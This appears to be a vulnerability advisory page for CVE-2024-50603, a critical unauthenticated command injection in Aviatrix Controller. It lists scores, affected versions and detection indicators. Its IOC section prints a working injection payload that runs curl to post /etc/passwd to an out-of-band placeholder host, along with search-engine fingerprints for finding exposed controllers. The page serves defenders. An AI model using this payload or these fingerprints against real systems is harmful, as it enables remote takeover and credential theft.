CVE-2024-50603
published 2025-01-08

Priority: P1 (99) · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability (due 2025-02-06)
Exploited in the wild
EPSS: 98.55% (99.9th percentile)
An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.

Affected

3 ranges
Vendor      Product      Version range            Fixed in
aviatrix    controller   < 7.1.4191               7.1.4191
aviatrix    controller   >= 7.2 < 7.2.4996        7.2.4996
aviatrix    controller   >= 7.2.0 < 7.2.4996      7.2.4996

Detection & IOCs (extracted from sources)

url: /v1/api
command: action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+{{oast}})
  • Exploit targets POST /v1/api with action=list_flightpath_destination_instances or flightpath_connection_test; inject shell metacharacters in cloud_type or src_cloud_type parameters to achieve unauthenticated RCE
  • Hunt for Aviatrix Controller instances via Shodan/FOFA/ZoomEye using title-based fingerprints: http.title:"aviatrix controller", http.title:"aviatrix cloud controller", app="aviatrix-controller", title="aviatrix cloud controller"
  • Detect exploitation via OAST/interactsh callback: look for HTTP POST to /v1/api returning HTTP 200 combined with out-of-band DNS/HTTP interaction containing root:.*:0:0: in the request body (exfiltrated /etc/passwd)
  • All observed malware was first deployed between 2025-01-07 and 2025-01-10; exploitation surged following publication of a Nuclei template — use this timeline to scope forensic investigation on Aviatrix Controller instances
  • The IP address 172.104.60[.]176 is associated with at least one Sliver-deploying actor but is likely a shared proxy server and therefore not strictly reliable as a standalone IOC
  • The patch must be re-applied if the Controller is later upgraded to a version prior to 7.1.4191 or 7.2.4996, or if the Controller does not have an associated CoPilot running version 4.16.1 or higher

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck   -         10.0    CRITICAL   -
cisa        -         9.8     CRITICAL   -